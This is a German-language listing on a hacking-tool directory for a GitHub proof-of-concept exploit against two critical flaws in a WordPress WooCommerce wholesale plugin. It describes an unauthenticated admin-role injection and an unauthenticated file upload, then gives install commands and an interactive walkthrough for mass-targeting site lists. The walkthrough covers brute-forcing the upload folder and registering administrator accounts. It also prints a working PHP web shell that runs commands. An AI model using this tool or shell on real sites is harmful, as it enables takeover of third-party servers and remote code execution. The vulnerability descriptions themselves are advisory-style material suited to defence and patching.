Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-27542-CVE-2026-27540- — Nicht authentifiziertes Privileg | Nicht authentifizierter beliebiger Datei-Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2026-27542-cve-2026-27540-
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubnxploited/cve-2026-27542-cve-2026-27540-

CVE-2026-27542-CVE-2026-27540-

Nicht authentifiziertes Privileg | Nicht authentifizierter beliebiger Datei-Upload

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
211vor 5 MonatenNoch nicht geprüft

Typing SVG


🔴 Übersicht über die Schwachstellen

CVE-2026-27542 — Unauthentifizierte Privilegieneskalation

FeldDetails
CVE-IDCVE-2026-27542
SchweregradKRITISCH — CVSS v3.1-Score: 9.8
VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Betroffene KomponenteWooCommerce Wholesale Lead Capture (WWLC)-Plugin für WordPress
SchwachstellentypUnauthentifizierte Privilegieneskalation
Erforderliche AuthentifizierungKeine
CWECWE-269: Improper Privilege Management

Beschreibung:
Das WooCommerce Wholesale Lead Capture-Plugin für WordPress ist in allen bekannten betroffenen Versionen anfällig für eine unauthentifizierte Privilegieneskalation. Die Schwachstelle besteht im wwlc_create_user-AJAX-Aktionshandler, der Benutzerregistrierungsanfragen verarbeitet, ohne die vom Benutzer übermittelten Rollenfelder ausreichend zu bereinigen oder zu validieren. Ein entfernter, nicht authentifizierter Angreifer kann eine speziell gestaltete POST-Anfrage erstellen, die beliebige WordPress-Fähigkeitsfelder — einschließlich wp_capabilities[administrator] — direkt in die Benutzermetadaten zum Zeitpunkt der Kontenerstellung injiziert. Dadurch kann sich der Angreifer ohne vorherige Authentifizierung oder Interaktion eines legitimen Benutzers selbst als WordPress-Administrator registrieren, was zur vollständigen Kompromittierung der betroffenen WordPress-Installation führt.


CVE-2026-27540 — Unauthentifizierter beliebiger Datei-Upload

FeldDetails
CVE-IDCVE-2026-27540
SchweregradKRITISCH — CVSS v3.1-Score: 9.8
VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Betroffene KomponenteWooCommerce Wholesale Lead Capture (WWLC)-Plugin für WordPress
SchwachstellentypUnauthentifizierter beliebiger Datei-Upload (führt zu Remote Code Execution)
Erforderliche AuthentifizierungKeine
CWECWE-434: Unrestricted Upload of File with Dangerous Type

Beschreibung:
Das WooCommerce Wholesale Lead Capture-Plugin für WordPress ist in allen bekannten betroffenen Versionen anfällig für unauthentifizierten beliebigen Datei-Upload. Die Schwachstelle liegt in der AJAX-Aktion wwlc_file_upload_handler, die ohne jegliche Anforderung einer Authentifizierung oder Nonce-Überprüfung registriert ist. Durch das Übermitteln einer manipulierten Multipart-POST-Anfrage an /wp-admin/admin-ajax.php kann ein entfernter, nicht authentifizierter Angreifer Dateien beliebigen Typs — einschließlich PHP-Webshells — in das Verzeichnis wp-content/uploads/ des Servers unter einem dynamisch generierten Unterverzeichnis wwlc-temp-* hochladen. Eine erfolgreiche Ausnutzung führt zu Remote Code Execution (RCE) auf dem zugrunde liegenden Webserver, der als Webprozess-Benutzerkonto arbeitet.


🛠️ Tool-Beschreibung

Dies ist ein Proof-of-Concept (PoC)-Exploit-Skript für die beiden oben beschriebenen kritischen Schwachstellen, das auf WordPress-Installationen mit dem Plugin WooCommerce Wholesale Lead Capture abzielt. Das Tool unterstützt zwei unabhängige Angriffsmodi:

ModusAngriffsartZiel
Modus 1Unauthentifizierter beliebiger Datei-Upload + Brute-Force-OrdnererkennungEine PHP-Webshell hochladen und sie durch mehrschichtiges Raten des Ordnernamens finden
Modus 2Unauthentifizierte Privilegieneskalation über RegistrierungSich selbst als WordPress-Administrator registrieren und den Admin-Zugriff verifizieren

📋 Anforderungen

Systemanforderungen

  • Python 3.8 oder höher
  • Internetzugriff auf die Zielsysteme
  • Linux / Windows / macOS

Python-Abhängigkeiten

pip install requests urllib3 colorama

Oder Installation über die Anforderungsdatei:

pip install -r requirements.txt

requirements.txt:

requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 Installation

# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540.git
cd CVE-2026-27542-CVE-2026-27540

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-27542_CVE-2026-27540.py

⚙️ Verwendung

Einfacher Start

python3 CVE-2026-27542_CVE-2026-27540.py

Das Tool bietet eine interaktive Terminaloberfläche. Sie werden zur Eingabe aller erforderlichen Parameter aufgefordert.


🗂️ Format der Zielliste

Erstellen Sie eine einfache Textdatei (z. B. list.txt) mit einer Ziel-URL pro Zeile:

https://target1.com
https://target2.com
http://target3.com/wordpress

🔴 Modus 1 — Datei-Upload + Ordner-Brute-Force

Select mode [1=Upload+Folder, 2=Registration+Admin]: 1
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Shell file path [shell.php]: shell.php
Shell signature (marker inside shell) [Nx_SHELL_SIGNATURE]: Nx_SHELL_SIGNATURE
Max pattern-based folder guesses per site [50000]: 50000
Max time-based folder guesses per site [50000]: 50000
Max random-hex folder guesses per site [100000]: 100000
Upload results file [scan_results/wwlc_uploads.txt]: scan_results/wwlc_uploads.txt
Found shells file [scan_results/wwlc_shells_found.txt]: scan_results/wwlc_shells_found.txt

Beispiel für die Shell-Datei (shell.php):

<?php
// Nx_SHELL_SIGNATURE
if(isset($_GET['cmd'])){ system($_GET['cmd']); }
?>

Hinweis: Der Ordner wwlc-temp-* wird vom Plugin mithilfe der PHP-Funktion uniqid('wwlc-temp-') dynamisch generiert. Das Tool verwendet eine mehrschichtige Brute-Force-Strategie, um ihn zu finden:

EbeneStrategieBeschreibung
0VerzeichnislistingVersucht, das Uploads-Verzeichnis aufzulisten, falls es offen ist
1MusterbasiertZeitbasiertes und sequenzielles numerisches Raten
2Zeitbasiertes HexAuf beobachteten Zeitstempeln von HTTP-Anfragen basierend
3Zufälliges HexReines Raten zufälliger Hex-Strings

🟠 Modus 2 — Registrierung + Rollen-Injection + Admin-Verifizierung

Select mode [1=Upload+Folder, 2=Registration+Admin]: 2
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Base registration username (prefix) [Nx_admin]: Nx_admin
Base registration email [[email protected]]: [email protected]
Registration results file [scan_results/wwlc_register_results.txt]:
Admin hits file [scan_results/Admin_login.txt]:

Das Tool führt folgende Schritte aus:

  1. Findet das WWLC-Registrierungsformular und extrahiert eine gültige Nonce
  2. Übermittelt eine manipulierte Registrierungs-Payload, die die Rolle administrator injiziert
  3. Versucht, sich mit den erstellten Anmeldedaten anzumelden
  4. Überprüft den Admin-Panel-Zugriff über mehrere WP-Admin-Endpunkte
  5. Speichert bestätigte Admin-Treffer in der Ausgabedatei

Tool herunterladen